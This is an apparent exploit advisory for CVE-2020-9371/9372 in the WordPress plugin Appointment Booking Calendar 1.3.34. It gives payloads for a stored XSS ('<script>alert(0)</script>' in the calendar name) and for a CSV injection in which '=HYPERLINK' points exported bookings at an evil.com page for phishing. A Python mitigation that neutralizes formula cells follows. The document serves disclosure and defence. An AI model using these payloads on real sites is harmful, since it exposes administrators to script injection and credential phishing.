# Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection
# Google Dork: N/A
# Date: 2020-03-05
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://www.codepeople.net/
# Software Link: https://downloads.wordpress.org/plugin/appointment-booking-calendar.zip
# Version: 1.3.34
# Tested on: Windows 7 x86 SP1
# CVE : CVE-2020-9371, CVE-2020-9372

----Stored Cross-Site-Scripting-------------------

1) In http://127.0.0.1/wordpress/wp-admin/admin.php?page=cpabc_appointments.php
2) Calendar Name=<script>alert(0)</script> and Update
3) Click any of the other tabs

----CSV injection---------------------------------

1) First we create a new calendar (Pages, Add New, booking calendar) and publish it (we can now log out)
2) Then we go to the page, enter data, and the payload:

New booking:

Name: IMPORTANT DATA
Description: http://evil.com/evil.php

New booking:

Name: test
Description: =HYPERLINK(K2;H2)

This is how it would work if I had a business registered and the payment was completed; the same bookings can also be added with the same data from the admin panel.

3) Then we go to Bookings List and export the CSV file
4) After that we open the file and import data from an external file, using comma as the separator
5) The hyperlink to the malicious PHP file is inserted; when the user clicks it, they are redirected to a fake login page (for example)

Tested on Windows 7 Pro SP1 32-bit, Wordpress 5.3.2 and Excel 2016
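As an added defensive illustration (not part of the advisory and not the plugin's own code), the following Python sketch shows how a booking-export routine could neutralize formula-triggering cells such as the =HYPERLINK payload above before writing the CSV, and flag such rows for review; the booking data is a constructed sample mirroring the two bookings in the steps.

```python
import csv
import io

# Leading characters that make a spreadsheet evaluate an imported cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """True if the cell would be treated as a formula after CSV import."""
    return value.lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralize_cell(value: str) -> str:
    """Prefix a formula-like cell with a single quote so it is kept as text."""
    if is_formula_like(value):
        return "'" + value
    return value


def export_bookings(bookings) -> str:
    """Write (name, description) rows as CSV, neutralizing and quoting every cell."""
    out = io.StringIO()
    writer = csv.writer(out, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(["name", "description"])
    for name, description in bookings:
        writer.writerow([neutralize_cell(name), neutralize_cell(description)])
    return out.getvalue()


def flag_suspicious(bookings):
    """Return the rows whose description looks like a formula, for logging or review."""
    return [b for b in bookings if is_formula_like(b[1])]


# Constructed sample mirroring the two bookings in the advisory.
SAMPLE_BOOKINGS = [
    ("IMPORTANT DATA", "http://evil.com/evil.php"),
    ("test", "=HYPERLINK(K2;H2)"),
]

if __name__ == "__main__":
    print(export_bookings(SAMPLE_BOOKINGS))
    print(flag_suspicious(SAMPLE_BOOKINGS))
```

The apostrophe may remain visible in the imported cell; that is the usual trade-off of this mitigation, and the export also quotes every field so embedded commas or quotes cannot break the row layout.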